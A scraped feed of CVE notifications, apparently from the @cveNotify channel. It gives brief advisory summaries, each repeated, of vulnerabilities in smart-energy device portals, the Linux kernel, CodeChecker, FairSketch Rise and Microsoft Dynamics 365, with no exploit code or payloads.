🚨 CVE-2025-31941
An unauthenticated attacker can obtain a list of smart devices by knowing a valid username.
🎖@cveNotify
An unauthenticated attacker can obtain a list of smart devices by knowing a valid username.
🎖@cveNotify
🚨 CVE-2025-31949
An authenticated attacker can obtain any plant name by knowing the plant ID.
🎖@cveNotify
An authenticated attacker can obtain any plant name by knowing the plant ID.
🎖@cveNotify
🚨 CVE-2025-24297
Due to lack of server-side input validation, attackers can inject malicious JavaScript code into users personal spaces of the web portal.
🎖@cveNotify
Due to lack of server-side input validation, attackers can inject malicious JavaScript code into users personal spaces of the web portal.
🎖@cveNotify
🚨 CVE-2025-24315
Unauthenticated attackers can add devices of other users to their scenes (or arbitrary scenes of other arbitrary users).
🎖@cveNotify
Unauthenticated attackers can add devices of other users to their scenes (or arbitrary scenes of other arbitrary users).
🎖@cveNotify
🚨 CVE-2025-25276
An unauthenticated attacker can hijack other users' devices and potentially control them.
🎖@cveNotify
An unauthenticated attacker can hijack other users' devices and potentially control them.
🎖@cveNotify
🚨 CVE-2025-26857
Unauthenticated attackers can rename arbitrary devices of arbitrary users (i.e., EV chargers).
🎖@cveNotify
Unauthenticated attackers can rename arbitrary devices of arbitrary users (i.e., EV chargers).
🎖@cveNotify
🚨 CVE-2025-27565
An unauthenticated attacker can delete any user's "rooms" by knowing the user's and room IDs.
🎖@cveNotify
An unauthenticated attacker can delete any user's "rooms" by knowing the user's and room IDs.
🎖@cveNotify
🚨 CVE-2025-27575
An unauthenticated attacker can obtain EV charger version and firmware upgrading history by knowing the charger ID.
🎖@cveNotify
An unauthenticated attacker can obtain EV charger version and firmware upgrading history by knowing the charger ID.
🎖@cveNotify
🚨 CVE-2025-27719
Unauthenticated attackers can query an API endpoint and get device details.
🎖@cveNotify
Unauthenticated attackers can query an API endpoint and get device details.
🎖@cveNotify
🚨 CVE-2025-27927
An unauthenticated attackers can obtain a list of smart devices by knowing a valid username through an unprotected API.
🎖@cveNotify
An unauthenticated attackers can obtain a list of smart devices by knowing a valid username through an unprotected API.
🎖@cveNotify
🚨 CVE-2025-27929
Unauthenticated attackers can retrieve full list of users associated with arbitrary accounts.
🎖@cveNotify
Unauthenticated attackers can retrieve full list of users associated with arbitrary accounts.
🎖@cveNotify
🚨 CVE-2025-30257
Unauthenticated attackers can retrieve serial number of smart meters associated to a specific user account.
🎖@cveNotify
Unauthenticated attackers can retrieve serial number of smart meters associated to a specific user account.
🎖@cveNotify
🚨 CVE-2025-30512
Unauthenticated attackers can send configuration settings to device and possible perform physical actions remotely (e.g., on/off).
🎖@cveNotify
Unauthenticated attackers can send configuration settings to device and possible perform physical actions remotely (e.g., on/off).
🎖@cveNotify
🚨 CVE-2025-31147
Unauthenticated attackers can query information about total energy consumed by EV chargers of arbitrary users.
🎖@cveNotify
Unauthenticated attackers can query information about total energy consumed by EV chargers of arbitrary users.
🎖@cveNotify
🚨 CVE-2022-49957
In the Linux kernel, the following vulnerability has been resolved:
kcm: fix strp_init() order and cleanup
strp_init() is called just a few lines above this csk->sk_user_data
check, it also initializes strp->work etc., therefore, it is
unnecessary to call strp_done() to cancel the freshly initialized
work.
And if sk_user_data is already used by KCM, psock->strp should not be
touched, particularly strp->work state, so we need to move strp_init()
after the csk->sk_user_data check.
This also makes a lockdep warning reported by syzbot go away.
🎖@cveNotify
In the Linux kernel, the following vulnerability has been resolved:
kcm: fix strp_init() order and cleanup
strp_init() is called just a few lines above this csk->sk_user_data
check, it also initializes strp->work etc., therefore, it is
unnecessary to call strp_done() to cancel the freshly initialized
work.
And if sk_user_data is already used by KCM, psock->strp should not be
touched, particularly strp->work state, so we need to move strp_init()
after the csk->sk_user_data check.
This also makes a lockdep warning reported by syzbot go away.
🎖@cveNotify
🚨 CVE-2025-40843
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy.
CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command.
This issue affects CodeChecker: through 6.26.1.
🎖@cveNotify
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy.
CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command.
This issue affects CodeChecker: through 6.26.1.
🎖@cveNotify
GitHub
Buffer overflow in CodeChecker log command
### Summary
CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal `ldlogger` library, which is executed by the `CodeChecker log` command.
### Details
Unsafe...
CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal `ldlogger` library, which is executed by the `CodeChecker log` command.
### Details
Unsafe...
🚨 CVE-2025-63293
FairSketch Rise Ultimate Project Manager & CRM 3.9.4 is vulnerable to Insecure Permissions. A remote authenticated user can append comments or upload attachments to tickets for which they lack view or edit authorization, due to missing authorization checks in the ticketing/commenting API.
🎖@cveNotify
FairSketch Rise Ultimate Project Manager & CRM 3.9.4 is vulnerable to Insecure Permissions. A remote authenticated user can append comments or upload attachments to tickets for which they lack view or edit authorization, due to missing authorization checks in the ticketing/commenting API.
🎖@cveNotify
Fairsketch
Simplify your software experience | Fairsketch
🚨 CVE-2020-0656
A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'.
🎖@cveNotify
A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'.
🎖@cveNotify